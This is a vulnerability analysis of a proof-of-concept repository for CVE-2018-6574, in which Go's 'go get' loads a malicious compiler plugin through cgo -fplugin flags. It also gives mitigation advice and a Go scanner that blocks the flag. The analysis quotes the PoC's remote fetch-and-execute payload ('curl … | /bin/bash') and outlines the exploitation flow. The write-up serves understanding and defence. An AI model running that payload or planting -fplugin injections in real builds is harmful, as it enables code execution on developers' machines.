Deep Dive: CVE-2018-6574 – Go "go get" RCE via Compiler Plugin Injection
This analysis examines the frozenkp/CVE-2018-6574 PoC repository, which demonstrates a remote code execution (RCE) vulnerability in certain Go toolchains: the go get command could be made to hand untrusted compiler plugins to the C compiler.
Background & Impact
- Root cause: Older Go versions passed compiler flags such as -fplugin= (which loads a gcc/clang compiler plugin) from the cgo directives of a fetched package straight through to the C compiler during go get, without sanitization. This let an attacker inject a malicious shared library into the build process.
- Severity: High (CVSS 7.8)
- Affected versions:
  - Go < 1.8.7
  - Go 1.9.x < 1.9.4
  - Go 1.10 pre-release < 1.10rc2
- Exploit vector: Execution of arbitrary commands during go get, while building Cgo-enabled Go packages.
Repository Contents
README.md
Explains that by hosting this PoC repo and running:
go get github.com/frozenkp/CVE-2018-6574
a malicious .so will be compiled and loaded, executing attacker-specified commands.
calc_darwin.so
A compiled shared library targeting macOS. It executes:
curl newton.cycarrier:8002 | /bin/bash
to fetch and run a remote script.
main.go
Minimal code invoking C bridging:
r := C.bridge_int_func(C.fortytwo)
fmt.Println(r)
This ensures the package is built through cgo, so the C compiler is invoked and the plugin .so is loaded and executed during compilation.
Exploitation Flow
- Host a PoC repo containing a malicious C plugin or a drop-in .so binary.
- The victim, running a vulnerable Go version, executes:
  go get github.com/frozenkp/CVE-2018-6574
- The compiler is invoked with -fplugin=./calc_darwin.so, loading the attacker’s plugin during the build.
- The plugin executes its payload (e.g., curl … | bash) for initial access.
- The Go app is compiled and installed, with the RCE having run transparently.
Mitigation & Resolution
- Fixed in Go 1.8.7, 1.9.4, 1.10rc2 and newer: flag sanitization now rejects -fplugin= and similar flags.
- To users:
  - Upgrade Go to at least 1.8.7, 1.9.4, or any 1.10+ release.
  - Avoid building untrusted code with the C/C++ toolchain enabled.
- To developers:
  - Audit usage of Cgo in dependencies.
  - Apply CI checks to detect unexpected -fplugin flags during builds.
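As an added example (not code from the PoC repository or from this write-up), the following Go program implements the CI check suggested above: it scans Go source text for #cgo directives and reports any flag with a -fplugin prefix. The sample source, include path and -lm flag are constructed; only the .so file name comes from the PoC.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Flag prefixes no dependency should pass to the C toolchain; -fplugin is the
// one CVE-2018-6574 abused (extend this list for a project's own policy).
var blockedPrefixes = []string{"-fplugin"}

// ScanCgoDirectives returns "line N: flag" for every flag in a
// "#cgo [constraints] KEY: flags" directive that has a blocked prefix.
// Both "// #cgo" line comments and "/* ... */" preambles are handled.
func ScanCgoDirectives(src string) []string {
	var hits []string
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		line := strings.TrimSpace(strings.TrimPrefix(strings.TrimSpace(sc.Text()), "//"))
		colon := strings.Index(line, ":") // flags follow the "KEY:" part
		if !strings.HasPrefix(line, "#cgo") || colon < 0 {
			continue
		}
		for _, flag := range strings.Fields(line[colon+1:]) {
			for _, p := range blockedPrefixes {
				if strings.HasPrefix(flag, p) {
					hits = append(hits, fmt.Sprintf("line %d: %s", n, flag))
				}
			}
		}
	}
	return hits
}

// Constructed cgo preamble in the shape of the -fplugin abuse; the .so name is
// the PoC's, the include path and library are made up.
const sample = `package main
/*
#cgo CFLAGS: -I/usr/include -fplugin=./calc_darwin.so
#cgo LDFLAGS: -lm
*/
import "C"
`
func main() {
	for _, h := range ScanCgoDirectives(sample) {
		fmt.Println("blocked cgo flag at", h) // a CI job would fail the build here
	}
}
```

Run it over every .go file in the module and its vendored dependencies before the build step, and fail the job on any hit.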
Timeline Highlights
- February 7, 2018: NVD entry for CVE-2018-6574.
- 2022–2023: Added to GitHub Advisory Database (May 2022; updated February 2023).
Conclusion
This PoC cleverly abuses Go’s Cgo/go get pipeline to inject compiler plugins and execute arbitrary code at build time. Though the CVE is resolved in modern Go releases, any environment using legacy Go versions (<1.8.7, <1.9.4, pre-1.10rc2) remains at risk if untrusted repositories are built. Developers should upgrade their toolchains and audit third-party code for unsafe build flags.